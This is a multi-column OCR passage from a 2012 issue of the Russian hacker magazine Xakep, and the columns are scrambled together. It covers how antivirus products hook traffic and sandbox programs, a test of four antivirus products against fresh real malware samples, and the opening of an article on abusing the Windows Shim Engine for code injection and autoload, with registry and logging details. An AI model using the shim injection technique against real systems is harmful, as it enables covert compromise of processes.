драйвера-фильтра в inf-файле указывается
еще и тип этого драйвера: драйвер-монитор, ПЕРЕХВАТИВ ЭТИ ФУНКЦИИ, МЫ
дающий возможность только просматривать
трафик, или драйвер-модификатор, допускаю- СМОЖЕМ КОНТРОЛИРОВАТЬ ПРОЦЕСС
щий еще и модификацию трафика. Думаю,
понятно, что второй тип в антивирусах исполь- ИНИЦИАЛИЗАЦИИ ВСЕХ СЕТЕВЫХ
зуется гораздо чаще, чем первый.
Другая возможность контролировать СОЕДИНЕНИЙ, А В ИТОГЕ — ВЕСЬ ТРАФИК
трафик на NDIS-уровне — это, как мы уже
говорили, перехват некоторых функций
из NDIS-драйвера. Из всего многообразия на них) гораздо целесообразнее и проще осу- ссылки, которые, равно как и содержимое
функций, экспортируемых этим драйвером, ществлять непосредственно в самом браузере. адресной строки, необходимо отслеживать
наиболее подходящими для данных целей Для этого многими антивирусными продук- и контролировать. Помимо вредоносных
будут NdisOpenAdapter и NdisRegisterProtocol. тами используется возможность наращивать ссылок, в содержимом веб-страниц могут быть
Перехватив эти функции, мы сможем контро- функциональность браузеров посредством вредоносные Java-скрипты, для распознава-
лировать процесс инициализации всех сетевых расширений. Чаще всего используются BHO ния которых на помощь опять-таки приходят
соединений, а в итоге — весь трафик, про- (Browser Helper Object — модуль поддержки антивирусные базы с сигнатурами.
ходящий через эти соединения. Так поступает, браузера). Модули BHO реализуются в виде В общем, имея хорошую и регулярно попол-
например, антивирус от компании Comodo, dll-библиотек, которые дополняют Internet няемую базу сигнатур вредоносных скриптов
который помимо установки промежуточного Explorer. Как правило, объекты BHO не имеют и ссылок на вредоносные сайты, можно до-
NDIS-драйвера еще и перехватывает функ- собственного пользовательского интерфейса статочно успешно отсеивать почти всю заразу,
ции NdisOpenAdapter, NdisRegisterProtocol, и существуют в виде простой библиотеки, ко- которая может встретиться в сети. Почти
NdisCloseAdapter и NdisDeregisterProtocol. торую браузер подгружает при старте. Спектр всю — потому что какой-нибудь свеженький
Некоторые системы защиты интернет- возможного применения BHO огромен — от мо- скрипт, которого нет в базе, будет наверняка
трафика довольствуются перехватом только дуля, который отслеживает вводимые в адрес- пропущен и сделает свое черное дело. Более
NdisOpenAdapter, который позволяет отследить ную строку данные, до подмены содержимого того, даже самый старый скрипт, который есть
установку и инициализацию сетевых адапте- веб-страниц и перенаправления запросов. во всех антивирусных базах, можно запросто
ров в системе. Самое главное при использова- Что может сделать с содержимым, к при- зашифровать или обсфусцировать по-новому,
нии такого рода перехватов функций — успеть меру, адресной строки антивирус, перехва- — и вот он уже и не такой старый, и запросто
перехватить их раньше, чем произойдет иници- тивший посредством BHO данные из Internet может пройти мимо всех препон, выстав-
ализация какого-нибудь сетевого соединения, Explorer’а? Во-первых, прогнать этот адрес по ленных антивирусными сканерами сетевого
иначе контролировать его уже не получится. своей базе вредоносных ссылок и заблоки- трафика.
ровать вывод страницы в случае наличия за- Поэтому на помощь приходят эвристика
КОНТРОЛЬ ЗА ТРАФИКОМ прашиваемой ссылки в этой базе. Во-вторых, и динамический анализ кода (то есть его ана-
В БРАУЗЕРАХ можно обратиться к различным облачным ре- лиз во время исполнения). К примеру, при ана-
Конечно, перехватив весь трафик на NDIS- сурсам (собственным или посторонним) и, в за- лизе html-кода антивирусы смотрят на параме-
уровне, можно было бы на этом и успокоиться. висимости от наличия этой ссылки в их базах тры, используемые тегом iframe (напомню,
Но все же контроль за содержимым адресной или на основе различных рейтинговых оценок, этот тег в тексте страницы часто используется
строки браузера, веб-страниц и java-скриптов предупредить пользователя о потенциальной для невидимой и неконтролируемой загрузки
(а ответственность за распространение вредоносности посещаемой страницы. вредоносных объектов). Если эти параметры
вредоносных программ посредством drive-by Непосредственно в самом содержимом кажутся ему подозрительными (типа высота
загрузок в большинстве случаев лежит именно веб-страницы тоже могут таиться нехорошие и ширина равны нулю или очень маленькие),

Текст Java-скрипта в перехваченном http-трафике Обфусцированный вредоносный Java-скрипт под названием Trojan-Downloader.Js.Agent.
ghd (понять, что он делает, довольно затруднительно)

ХАКЕР 04 /159/ 2012 077

MALWARE

WWW
Про NDIS можно
почитать на vitki.net/
ru/story/vvedenie-v-
ndis (на русском) или
на msdn.microsoft.
com/en-us/library/
ff564881 (по-
английски)

DVD
Содержание двух
предыдущих статей
цикла ищи нашем
диске.

Замена стандартного обработчика Java-скриптов на собственный, Перехват некоторых функций из ntdll.dll, выполненный песочницей SandboxIE
выполненная «Антивирусом Касперского» (подложные функции находятся в библиотеке SbieDLL.dll)

то это повод навострить уши. Тем более, что программ с контролируемыми параметра- смотря на это, данный подход является основ-
iframe используется все реже и реже. ми многие объясняют аналогией с детской ным в большинстве продуктов (SandboxIE,
Что касается зашифрованных, обфусци- песочницей. Что ж, такая версия тоже имеет BufferZone, изолированные среды антивирусов
рованных или еще незнакомых антивирусу право на существование, но лично мне ближе Kaspersky Internet Security, Comodo Internet
вредоносных скриптов, то выходом является другая. У пожарных «песочницей» называется Security Pro, Avast Internet Security).
эмуляция их исполнения с последующим специальный бак с песком, в котором можно
анализом по сигнатурам или с помощью эври- безопасно экспериментировать с легковоспла- Изоляция на основе правил
стики. меняющимися веществами. Все попытки изменения объектов файловой
Для выполнения Java-скриптов исполь- В антивирусных песочницах можно выде- системы или реестра не виртуализируются,
зуется движок, который представляет собой лить три базовые модели изоляции простран- а рассматриваются с точки зрения набора вну-
DLL-модуль jscript.dll. Он находится обычно ства от всей остальной системы. тренних правил средства защиты. Недостаток
в папке %windir%\system32, содержит реали- такого подхода тот же, что и во втором случае
зацию набора COM-интерфейсов и использует- Изоляция на основе полной виртуализации — возможность выхода зловредного при-
ся IE для выполнения JS. В Windows опреде- Заключается в использовании движка ложения из-под контроля песочницы. Однако
лено три GUID (уникальных идентификаторов) виртуальной машины в качестве защитного в этом случае гораздо проще осуществлять
COM-объекта — движка интерпретатора слоя над гостевой операционной системой. обмен данными между контролируемой средой
скриптов Jscript. Это {f414c260-6ac0-11cf- Такой подход дает очень высокий уровень и основной системой. Пример — Windows User
b6d1-00aa00bbbb58}, {f414c261-6ac0-11cf- защиты основной рабочей системы. Недо- Account Control (хорошо всем известный и мно-
b6d1-00aa00bbbb58} и {f414c262-6ac0-11cf- статки очевидны — большой объем, большое гим надоедающий контроль учетных записей
b6d1-00aa00bbbb58}.Если поискать в реестре потребление ресурсов системы и сложность Windows).
эту строку, то можно увидеть, какой модуль обмена данными между основной системой В связи с тем, что наиболее широкое при-
зарегистрирован в качестве интерпретатора и песочницей. менение получил второй подход, стоит его
JavaScript. Как уже было упомянуто, обычно рассмотреть подробнее на примере широко
это jscript.dll. Но ничего не мешает антивирусу Изоляция на основе частичной виртуализа- распространенной песочницы SandboxIE. Фай-
подменить эту ветку реестра и зарегистри- ции файловой системы и реестра ловая система виртуализируется достаточно
ровать в системе свой обработчик скриптов, Совсем не обязательно использовать движок просто — путем создания дубликатов папки
который и будет выполнять анализ их вредо- виртуальной машины для изоляции выполне- текущего пользователя, дубликатов журна-
носности и «пущать или не пущать». ния программ. Можно просто подставлять про- лов транзакций общей файловой системы
Недостаток такой подмены в том, что цессам, запущенным в песочнице, не реальные и папок, имитирующих накопители (внутрен-
анализируются только скрипты, выполняе- объекты файловой системы и реестра, а их ние и внешние). Также создается дубликат
мые в браузерах, использующих стандартный дубликаты. Попытка их изменения приведет реестра.
JavaScript-движок Windows. к изменению лишь их копий внутри песочницы, После того как созданы дубликаты фай-
реальные данные не изменятся и не пострада- ловой системы и реестра, задача песочницы
КАК РАБОТАЕТ ПЕСОЧНИЦА ют. Основной недостаток такого вида песочниц сводится к перехвату всех функций работы
Почему-то происхождение названия «песоч- — пробои или обход, и в результате — выход с файлами и реестром. Если приложение,
ница» для изолированной среды исполнения вредоносного кода в основную систему. Не- обращающееся к реестру или пытающееся
создать/изменить какой-либо файл, запущено
не из-под песочницы, то управление пере-
дается оригинальным функциям. Если же
такое приложение выполняется в песочнице,
В АНТИВИРУСНЫХ ПЕСОЧНИЦАХ МОЖНО то вместо настоящего реестра и настояще-
го внешнего накопителя ему посредством
ВЫДЕЛИТЬ ТРИ БАЗОВЫЕ МОДЕЛИ перехваченных функций подсовываются их
дубликаты.
ИЗОЛЯЦИИ ПРОСТРАНСТВА ОТ ВСЕЙ Поскольку функций, с помощью которых
можно работать с файловой системой и рее-
ОСТАЛЬНОЙ СИСТЕМЫ стром, много, то и перехватов приходится де-

078 ХАКЕР 04 /159/ 2012

 С антивирусами покончено!

лать много. К примеру, SandboxIE производит эвристического анализатора. Так работают Для песочницы из состава Comodo Internet
перехват 56 функций из ntdll.dll, 68 функций из песочницы из состава большинства анти- Security основной режим — режим постоянной
user32.dll, 71 функции из advapi32.dll, 6 функ- вирусных продуктов (в частности Kaspersky защиты с эвристическим алгоритмом принятия
ций из kernel32.dll и 1 функции из ws_32.dll. Internet Security и Comodo Internet Security решения. Однако помимо этого существует
Теперь пара слов про методы принятия Pro). возможность ручного запуска приложений
решения о помещении выполняемого приложе- в песочнице.
ния в песочницу, а также о режимах ее работы. Что касается режимов работы, то их тоже
Методов принятия решения по большому счету два — режим постоянной защиты и режим ЗАКЛЮЧЕНИЕ
два. ручной защиты. В первом случае приложение Конечно, некоторые детали остались за
автоматически помещается в песочницу либо кадром, да и разработчики в антивирусных
На основе правил выполняется вне ее в зависимости от резуль- лабораториях все время изобретают что-то но-
Модуль принятия решения обращается к вну- тата работы модуля принятия решения при вое, пытаясь догнать и перегнать создателей
тренней базе правил запуска приложений и в старте приложения. Во втором — пользователь вредоносного программного обеспечения… Но
зависимости от них запускает приложения либо сам принимает решение о запуске процесса главное, что все эти антивирусные премудро-
в песочнице, либо в основной системе. Такой внутри песочницы. К примеру, для SandboxIE сти обрели порядок и свое место на много-
подход применяют SandboxIE, BufferZone. (песочница на основе частичной виртуализа- численных полочках в твоей голове. А там,
ции) основным режимом работы является ре- глядишь, и ты придумаешь что-нибудь такое,
На основе эвристических подходов жим ручной защиты, но при покупке лицензии что произведет революцию в антивирусном
В этом случае решение о запуске в песочнице можно активировать режим постоянной за- деле, и редактору придется выделять место
принимается на основе результатов работы щиты с принятием решения на основе правил. под новые статьи в нашем журнале. z

Общий принцип изоляции файловой системы в SandboxIE Виртуализация файловой системы в SandboxIE (в папке drive находятся папки, имитирующие внешние накопители)

INFO
В случае использо-
ОБЛАЧНЫЕ ТЕХНОЛОГИИ НА АНТИВИРУСНОЙ СЛУЖБЕ вания песочниц для
изоляции выполняе-
мого кода следует
помнить, что многие
Началом применения облачных технологий в антивирусном еще не скачана, автоматически происходит обновление баз. из них виртуализи-
руют далеко не всю
деле можно, наверное, считать предоставление В сигнатурах содержится не только часть тела вируса или его систему. Как пра-
антивирусными компаниями возможности онлайн-проверки хэш, но и некоторые типичные сценарии поведения, которые вило, это несколько
файлов на вредоносность. Эта возможность существует позволяют однозначно определить вредоносность программы. критически важных
объектов, например:
и по сей день, но под облачными технологиями в сфере В антивирусах от компании Comodo та же самая фигня носит папки Program
антивирусной защиты сегодня понимается уже совсем название «Облачный анализ поведения приложений», и с Files, Windows,
Users\%AllUse-
другое. Почти все крупные антивирусные компании его помощью подозрительные файлы отправляются на rsProfile%\Program
используют облака в качестве огромной антивирусной базы, дополнительный анализ. Data, Documents
причем фактически пополняемой самими пользователями, Говоря про облачные технологии в сфере борьбы and Setting и ветвь
реестра HKLM\
давшими согласие на участие в программе пополнения с вредоносными программами, нельзя не упомянуть Software.
и уточнения информации о вредоносных и потенциально «Лабораторию Касперского» с ее Kaspersky Secu-
Про обфускацию
вредоносных объектах. В разных антивирусных компаниях rity Network. KSN — сеть информационной безопасности, Java-скриптов очень
это называется по-разному. У Microsoft Security Essential позволяющая пользователям получать оперативные хорошо написано
— «Служба динамических сигнатур DSS (Dynamic Signature данные о репутации программ и веб-сайтов, оперативно в статье «JavaScript:
игры в прятки»
Service)». Если на выходе проактивной защиты файл будет реагируя на появление новых угроз. С помощью KSN в новых в девятом номере ][
расценен как подозрительный (к примеру, пытается изменить антивирусных программах от «Лаборатории Касперского» за 2011 год.
системные файлы), но сигнатурный анализатор на него реализованы функции веб-фильтра, антифишинговый
никак не отреагировал, то создается профиль этого файла, модуль, функция контроля программ (рейтингование софта
который отсылается для анализа в специальные сервисы по признакам опасности при назначении доступа к ресурсам
Microsoft — DSS, SpyNet и MRS (Microsoft Reputation Services). ПК и персональным данным) и модуль анти-спам, который
В случае, когда в базе обновления сигнатура уже есть, но она обращается в KSN за образцами спам-писем.

ХАКЕР 04 /159/ 2012 079

MALWARE deeonis ([email protected])

Неизвестная
угроза
ИСПЫТЫВАЕМ ЭВРИСТИКУ
АВЕРОВ НА САМЫХ НОВЫХ
ВИРУСАХ
Как известно, антивирусное ПО работает в полную силу
только в том случае, если своевременно получает свои
апдейты. Об этом догадываются и вирмейкеры, которые
выпускают новые версии зловредов чуть ли не каждый день.
Сегодня мы проверим, насколько хорошо аверы справятся
с самыми свежими экземплярами вирусов и троянов,
которых еще нет у них в базах.

егодняшние испытания мы будем граммного обеспечения. Вирмейкеры в своих (три из которых были пожаты UPX) и два зага-
C проводить на реальных зловредах,
которых написали реальные киберз-
ТЗ выделяют Авиру в отдельный пункт, а по
уровню причиняемой головной боли этого
дочных файла с расширением lpe, которые из-
нутри были похожи один на pdf, а другой — на
лодеи для своих реальных киберзлодейских авера можно сравнить разве что с IE6, который zip-архив. Всего получилось десять зловредов.
нужд. Напомним, что для всех наших предыду- портит нервы добрым и трудолюбивым вер- Само тестирование у нас будет проходить
щих тестов мы писали собственные сэмплы, стальщикам и web-кодерам. в два этапа. На первом этапе мы натравим
которые хоть и не были настоящими зловреда- антивирусы с несвежими базами на найденные
ми, но усиленно старались ими представиться. УСЛОВИЯ ТЕСТИРОВАНИЯ трояны и запишем результат. Таким образом мы
Настоящие же трояны должны показать, кто Для тестов мы засетапили на вируталку све- проверим, насколько хорошо аверы справляют-
из производителей антивирусных программ женькую Windows XP sp3 со всеми апдейтами, ся с новым, неизвестным им вредоносным ПО.
лучше отрабатывает деньги, с таким трудом а затем начали устанавливать антивирусы, Вторая часть испытаний состоится через неде-
добываемые их клиентами. Но чтобы проверка попутно создавая снапшоты виртуальной лю после первой. Мы дадим антивирусам время
была еще хардкорней, мы раздобыли пачку машины для каждого из аверов, чтобы они на обнаружение и детект наших зловредов, за-
самых свежих представителей патогенной не мешали друг другу. Затем мы быстренько тем обновим базы и просканим вредоносов еще
киберфауны, а для большей надежности еще проапдейтили базы сигнатур до актуального раз. Это позволит нам узнать, насколько плохо
и отключили автообновление наших испытуе- состояния и оставили все это хозяйство на не- противовирусное ПО справилось в первый раз.
мых примерно за неделю до отлова зловредов. делю в темном прохладном месте без интер-
Кстати, об испытуемых антивирусах. Сегод- нета, чтобы наши испытуемые ненароком не НАЧИНАЕМ ТЕСТИРОВАНИЕ
ня к нам в лабораторию попало следующее за- обновились. Итак, мы подождали, пока антивирусные базы
щитное ПО: Kaspersky CRYSTAL, Dr.Web Security Через неделю мы пошли за свежей малва- достаточно устареют, и начали тестирование.
Space, ESET NOD32 Smart Security 5 и Avira Free рью — описание этой разношерстной компании Сегодня аверы будут идти в алфавитном поряд-
Antivirus. Все претенденты на звание лучшего ты можешь видеть на врезке. ке, поэтому первым пойдет Avira Free Antivirus.
из лучших (или, наоборот, худшего из худших) Но кое-какую исследовательскую работу Для чистоты эксперимента мы вообще вы-
нам уже давно знакомы. Стоит сказать лишь мы все-таки провели — открыли вирусные дернули сетевой кабель из машины, на которой
про ПО от немцев — пусть тестируемая версия файлики в hex-редакторе и посмотрели на них собираемся проводить тесты, — современные
Avira и бесплатная, но она давно считается с полминутки. В итоге мы смогли рассмотреть антивирусы очень любят скрытно обновлять
одним из самых параноидальных антивирусов два swf-файла, один Visual Basic Script, один себя, сливать инфу о файлах на свои сервера
среди современного зоопарка защитного про- Java-скрипт, четыре исполняемых exe-файла и использовать всякие облачные технологии.

080 ХАКЕР 04 /159/ 2012

 Неизвестная угроза

Dr.Web справился с неизвестной ему угрозой лучше всех Результаты Каспера без обновленных баз

Доктор Веб совсем плох, свежие базы сигнатур ему не помогли Kaspersky отжог: total detection

Поэтому, чтобы все было честно, доступ к сети качественно выделить сигнатуры, мы не знаем, уже под другим именем (HEUR:Trojan.Win32.
был жестко ограничен. Также мы отключили но факт остается фактом, — трой обнаружен. Generic). Программка-загрузчик своих старших
файловые мониторы и прочие фоновые про- Остальные два детекта — это эксплоиты. братьев стабильно детектится нашими анти-
верки, чтобы эти компоненты защитного ПО не Первый эксплуатирует уязвимость в формате вирусами. Второй угрозой был pdf-эксплоит,
мешали скопировать наш минизверинец на ПК. pdf, о чем недвусмысленно говорит название обнаруженный Доктором Вебом, но имя по вер-
Но вернемся к испытаниям. Распаковав ар- вируса (Exploit.PDF.2633), а второй покушается сии Лаборатории Касперского у него немного
хивчик со зловредами в специально отведен- на Flash — Exploit.SWF.193. Стоит напомнить, другое — HEUR:Exploit.Script.Generic. Видно,
ную для них директорию, мы кликнули по этой что у нас было два swf-файла, но опасным что в обоих случаях отработала эвристика, но
директории правой кнопкой мыши и выбрали был признан только один. Так же следует непонятно, почему в отчете нет информации
пункт Scan. Не слишком расторопная Авира сказать, что эксплоиты обычно не содержат о третьем опасном файле, ведь в первоначаль-
немного призадумалась, но затем все же заня- какого-либо вредоносного кода, а служат лишь ных результатах говорилось о трех угрозах.
лась сканированием, после чего выдала окно для загрузки настоящих вирусов. Avira Free Мы не можем сказать, был ли детект третьего
с результатами. Из десяти вредоносных файлов Antivirus не обнаружил этих файлов — возмож- зверька, а потому засчитываем только два
Avira обнаружила только один, обозвав его DR/ но, потому что понадеялся перехватить более положительных срабатывания эвристики, что
Delphi.Gen. Благодаря гуглу, официальному серьезную угрозу (но, как оказалось в итоге, дает нам результат 2/10.
сайту и помощи Капитана Очевидность мы сделать этого не смог). Доктор Веб же поступил Последним идет NOD32. Сканирование
выяснили, что своему детекту зловред обязан более продуманно, попытавшись обезвредить все тех же файлов завершилось сообщением
эвристическому движку антивируса. Таким об- заразу на ранних этапах наступления. Trojan. об одной найденной угрозе. Самые догадли-
разом, эвристика сработала, но не совсем так, MulDrop.20121 также является загрузчиком вые уже, наверное, поняли, что это был тот
как того хотелось бы германским программи- других вирусов. самый exe-загрузчик, который попался трем
стам. Результат 1/10 хоть и лучше, чем ничего, Итак, Dr.Web обнаружил три угрозы из предыдущим антивирусам. На этот раз его имя
но как-то не внушает особенного оптимизма. десяти, что лучше, чем у немецкого антивируса, было Win32/Injector.FP. К сожалению, мы так
Следующим идет Dr.Web Security Space. но все равно недостаточно хорошо для защиты и не смогли понять, сработала ли тут сигна-
Зеленый паук был натравлен на ту же самую системы. Следующий у нас в списке Kaspersky тура в базе или эвристический движок, но
папку. Сканирование прошло быстро, и его CRYSTAL. Забегая вперед, скажем, что его одно очевидно: результат 1 из 10 — это плохой
результаты оказались получше, чем у пред- результаты нельзя трактовать однозначно, но результат.
шественника. Главной угрозой стал все тот обо всем по порядку.
же DR/Delphi.Gen, но уже с новым именем После сканирования вирусной директории ВТОРОЙ ЭТАП ИСПЫТАНИЙ
— Trojan.MulDrop.20121. Судя по названию, мы получили сообщение, говорящее нам о трех После того, как мы протестили аверов не-
файлик был обнаружен с помощью конкретной обнаруженных угрозах. Чтобы рассмотреть известными для них троянами, мы оставили
сигнатуры, которая была в базе уже довольно получше, что же там нашел каспер, мы решили их в покое на недельку, а потом обновили
давно. Число 20121, видимо, означает размер взглянуть на подробный отчет, но тут нас ждал базы сигнатур. За неделю любой уважающий
вредоноса, но у нашего зверька этот размер сюрприз — в табличке с найденными злов- себя антивирус должен переловить всех на-
немного отличается — 20992 байт. Повезло редами было всего два файла. Первый — это ших зловредов и научиться безжалостно их
доктору, или ему действительно удалось так уже хорошо известный нам DR/Delphi.Gen, но уничтожать. Ну что же, проверим, так ли это

ХАКЕР 04 /159/ 2012 081

MALWARE

NOD32 — совсем как Avira

Скромные результаты Avira Free Antivirus После обновления у Авиры все намного лучше NOD32 обновился и нашел шесть зловредов

на самом деле. Со свежими базами Авира по- чие разоблачающие действия, которые были получают Avira и ESET (кубок один, потому
казала себя ровно в шесть раз лучше, чем на выполнены в процессе проверки. В итоге пусть они сами решают, у кого на полочке
первом этапе, но четыре файла так и не были Kaspersky Crystal со свежими базами обна- он будет стоять). Всего один обнаруженный
идентифицированы спустя неделю после их ружил все десять зловредов, большинство зловред в первом испытании — это чу ть
выхода в дикую природу. Также интересно, из которых были уничтожены в первые же лучше, чем ничего, а шесть троянов после
что Avira обнаружила pdf-эксплоит, который секунды, хотя два файла по непонятным нам обновления баз можно назвать улучшением
ранее не видела, хотя его коллеги ругались причинам так и остались лежать на жестком сит уации на 600% или «ваша система все
на него в первую очередь. JS, который неде- диске. Такой результат заслуживает уважения, равно будет инфицирована, даже если вы
лю назад не обнаруживался ни одним авером, которое, однако, может быстро рассеяться, рег улярно обновляетесь».
на этот раз попал в поле зрения немецкого если мы вспомним результаты первой части Кубок «За лучшие базы сигнатур» по-
защитного ПО, назвавшего его HTML/Dlcr. тестирования. лучает антивирус Касперского, 10/10 — это
Dawn.C.2. Остальные детекты — это exe- ESET NOD32 выступил с результатом, иден- действительно впечатляет. Правда, если ты
файлы, а swf-эксплоиты были отпущены на тичным Авире — шесть из десяти. Правда, на- схватишь совсем свеженький вирус (а настоя-
свободу. Шесть из десяти — таков результат бор детектируемых файлов немного отличался щие киберзлодеи об этом позаботятся), то тебе
Avira Free Antivirus со свежими базами. — больше эксплоитов, меньше exe-файлов, — скорее всего захочется расколотить этот кубок
Теперь очередь Dr.Web. После обновле- но это не особенно влияет на общую оценку. об голову победителя.
ния баз мы не увидели такого прогресса, как А теперь настало время для подведения Антивирусу Dr.Web достается сразу два
у предыдущего антивируса. Всего лишь четыре итогов. кубка: «За самую отчаянную борьбу с неиз-
из десяти: к списку вредоносов добавился один вестными доселе зловредами» и «За самый
исполняемый файл, который окрестили как НАГРАЖДЕНИЕ отстойный детект с обновленными базами».
Trojan.SMSSend.1950. Больше ничего подозри- Мы решили, что называть лучшего в этих Слишком медленно добавляете сигнатуры,
тельного доктор не обнаружил. испытаниях будет не совсем правильно, господа, слишком медленно.
Касперский проявил себя иначе. Просканив поэтому вместо первого, второго и так да- На этом мы прощаемся с тобой и спуска-
директорию с вирусами, он выдал неприлично лее мест мы раздадим кубки за достижения емся обратно в наш подвал-лабораторию, где
большое число инфицированных объектов, в различных номинациях. Первый кубок — займемся новыми бесчеловечными опытами
что скорее всего означает распаковку и про- «За самые посредственные результаты» — и тестами. z

А ЧТО ЖЕ ЭТО ЗА ВИРУСЫ ТАКИЕ?

Чтобы тестирование было максимально честным, мы собрали требующего оплаты за разблокировку. Не отказались мы и от
представителей самых разных областей зловредного мира. Один мобильного сектора — троянец, отправляющий СМС на платные
из вредоносов «выбрасывает из себя» множество разнообразной номера, тоже попал в исследование. Кроме того в тесте участвовала
малвари — троянцев, бэкдоров и прочей нечисти. Этим и объясняется мошенническая программа, относящаяся к категории «платных
удивившее автора расхождение в количестве детектов. Другой вообще архивов» (такие программы требуют отправить СМС на премиум-номер
представляет собой скрипт на языке VBS, основными назначениями якобы за получение доступа к заархивированному файлу). Также был
которого являются загрузка и запуск другого троянца. Еще в файлах, протестирован PDF-эксплойт, вариации которого широко используются
участвующих в тесте, присутствовал эксплойт, эксплуатирующий CVE- в эксплойт-паках для проведения drive-by атак. Наконец, в тесте
201-0611. Скриптовый троян-загрузчик, аналогичный вышеописанному, участвовали троянец, выполняющий множество деструктивных
но созданный на JS, тоже попал в выборку. Не обошлось и без действий, и вредоносный flash-файл, осуществляющий загрузку
winlocker'а — вредоноса, блокирующего работу системы, а затем и запуск зловреда.

082 ХАКЕР 04 /159/ 2012

Preview
КОДИНГ

TRUE-КРИПТОВАНИЕ
088 Сегодня у нас сложная задача — сделать
шифровалку данных, которая позволя-
ла бы создавать невидимые в системе
контейнеры и использовала собствен-
ный криптографический алгоритм. За
основу мы возьмем известную программу
TrueCrypt, которая распространяется с
открытыми исходниками. Убедившись в
отсутствии в ней закладок, мы создадим
«доверенный» билд утилиты, в котором
точно будет все ок. Недоверие к зару-
бежным шифрам и здоровый патриотизм
наталкивают на мысль реализовать
отечественные криптографические ал-
горитмы, которые во многом не уступают
зарубежным аналогам. Этим и займемся,
благо сделать это не сильно-то и сложно.

КОДИНГ UNIXOID

SHIM: НОВЫЙ МЕТОД ИНЖЕКТА ЗВЕНЬЯ ОДНОЙ ЦЕПИ БИТВЫ ЗЕЛЕНЫХ РОБОТОВ
084 Способы инжекта кода в атакуемое при- 106 Одним из главных новшеств ядра Linux 111 Стандартная прошивка для Android-
ложение давно известны. Однако оста- версии 2.6 стала поддержка виртуальной смартфона — удел тети Клавы, когда есть
лись такие технологии как Shim Engine, файловой системы sysfs. Как это может мощные альтернативные firmware в лице
которые еще могут тебя удивить. быть полезно обычным пользователям? CyanogenMod и MIUI.

SYN\ACK FERRUM

НЕИЗМЕННО ВЫСОКАЯ ДОСТУПНОСТЬ СВЕЖЕЕ ДЫХАНИЕ СЕТЕВОЙ ФОРСАЖ

122 HOWTO: как создать высокопроизводи- 128 В этом году корпорация Microsoft прак- 139 Редакция решила, наконец, обновить
тельный и устойчивый к сбоям файловый тически полностью обновит линейки свои старые точки доступа. Берем пять
сервис на базе парочки стареньких своих основных продуктов. Кратко прой- топовых беспроводных маршрутизато-
серверов и Samba. демся по всем основным новинкам 2012. ров и выбираем из них лучший.

ХАКЕР 04 /159/ 2012 083

КОДИНГ TSS ([email protected])

SHIM:
новый метод инжекта
Существует множество способов инжекта кода в атакуемое
ИСПОЛЬЗОВАНИЕ приложение, это и правка импорта сторонней dll, и атака
SHIM ENGINE ДЛЯ типа dll redirection, и создание удаленного потока, и посылка
apc с адресом LoadLibrary. Способов уйма, но все эти
ВНЕДРЕНИЯ КОДА способы довольно хорошо известны. Можно ли удивить чем-
то искушенного читателя? Попробуем.
И АВТОЗАГРУЗКИ

ЧТО ТАКОЕ SHIM’Ы ? дут заменены функции в таблице импорта приложения some.exe. То
Shim Engine — это технология для обеспечения совместимости есть механизм обратной совместимости в Windows обеспечивается
старших версий Windows с младшими, реализованная в различ- банальным перехватом API.
ных dll, а также через некоторые калбеки и хаки в PE-загрузчике Использование шимов позволяет очень многое, от простых
библиотеки ntdll.dll. вещей вроде добавления флагов в PEB, до виртуализации реестра
На уровне пользователя посмотреть на режимы совместимости и полного изменения поведения Heap Manager’a.
можно на соответствующей вкладке свойств любого исполняемого К примеру, шим, виртуализирующий реестр, перехватывает
файла: практически все функции работы с реестром в ADVAPI32.DLL:

some.exe Æ Свойства Æ Совместимость Æ Режим RegConnectRegistryA, RegConnectRegistryW, RegOpenKeyExA,

Совместимости Æ Windows95 RegOpenKeyExW, RegQueryValueExW,RegCloseKey,
Å будет использоваться шим совместимости с Windows 95 RegOpenKeyW, RegQueryValueA, RegQueryValueW,
RegCreateKeyA, RegCreateKeyW, RegCreateKeyExA,
Что значит «будет использоваться»? Это значит, что из стан- RegCreateKeyExW, RegEnumValueA, RegEnumValueW,
дартной базы шимов будет извлечена некоторая информация, на RegEnumKeyA, RegEnumKeyW, RegEnumKeyExA, RegEnumKeyExW,
основе нее будет загружена стандартная dll для совместимости, RegQueryInfoKeyA, RegQueryInfoKeyW, RegSetValueExA,
в которой есть опять-таки стандартные функции. И именно ими бу- RegSetValueExW, RegDeleteKeyA, RegDeleteKeyW

084 ХАКЕР 04 /159/ 2012

 Shim: новый метод инжекта

Добавляем свое приложение в EMET Включаем режим логирования шимов

Далее мы разберемся, как работает Shim Engine и как его мож- [HKEY_CURRENT_USER\Software\Microsoft\Windows NT\
но использовать в наших целях, а цели у нас простые – загрузить CurrentVersion\AppCompatFlags\Layers]
свой код в чужой процесс. "C:\\Documents and Settings\\Admin\\Рабочий стол\\test.
exe"="WIN2000"
ИССЛЕДУЕМ ШИМЫ
Чтобы понаблюдать работу шимов, можно включить режим Как видишь, она указывает, что для test.exe должен при-
логирования. Для этого надо установить системную переменную меняться шим Win2000. Вероятно, это значит, что мы можем
окружения SHIMENG_DEBUG_LEVEL равной 4 и перезагрузиться устанавливать режим совместимости любому приложению при-
(перезагрузка требуется при любых изменениях или добавлениях нудительно. Это нам пригодится. Однако для внедрения своего
системных переменных окружения). кода мы должны не столько прописать, сколько установить для
Если после этого запустить любое приложение (пусть это будет него свой (!) режим совместимости. То есть придется создать
блокнот, переименованный в test.exe) в режиме совместимости и внедрить в систему свою собственную базу шимов. Реше-
с, например, Windows 2000 и включить WinDbg, можно наблюдать ние о том, как это сделать, не лежит на поверхности. В ветке
любопытные логи. Например, такие: AppCompatFlags больше ничего интересного нет. Поэтому при-
дется копнуть немного глубже.
[INFO] [SeiSetLayerEnvVar] Env var set __COMPAT_LAYER="Win2000"
... ИЩЕМ СПОСОБ ВНЕДРЕНИЯ СВОЕЙ БАЗЫ ШИМОВ
[INFO] [SE_DllLoaded] INIT. loading DLL "AcLayers.DLL". Забегая вперед, скажу, что Shim Engine в основном реализо-
... ван в shimeng.dll и apphelp.dll, а базы шимов лежат в sysmain.
[MSG ] [SeiInit] Shim DLL 0x71660000 "C:\WINDOWS\AppPatch\ sdb и drvmain.sdb (в директории \WINDOWS\AppPatch), однако
AcLayers.DLL" loaded загрузкой стандартной dll шимов, парсингом базы и перехватом
[MSG ] [SeiInit] Using SHIM "Win2000VersionLie!AcLayers.DLL" функций занимается непосредственно загрузчик PE-модулей
... Windows. Тот самый, что сидит в ntdll.dll. Конечно, чтобы лучше
[INFO] [SeiInit] GetHookAPIs returns 3 hooks for DLL "C:\ понять, как внедрить свою базу, начать исследование лучше
WINDOWS\AppPatch\AcLayers.DLL" SHIM "Win2000VersionLie" всего с момента загрузки Shim Engine, а искать этот момент луч-
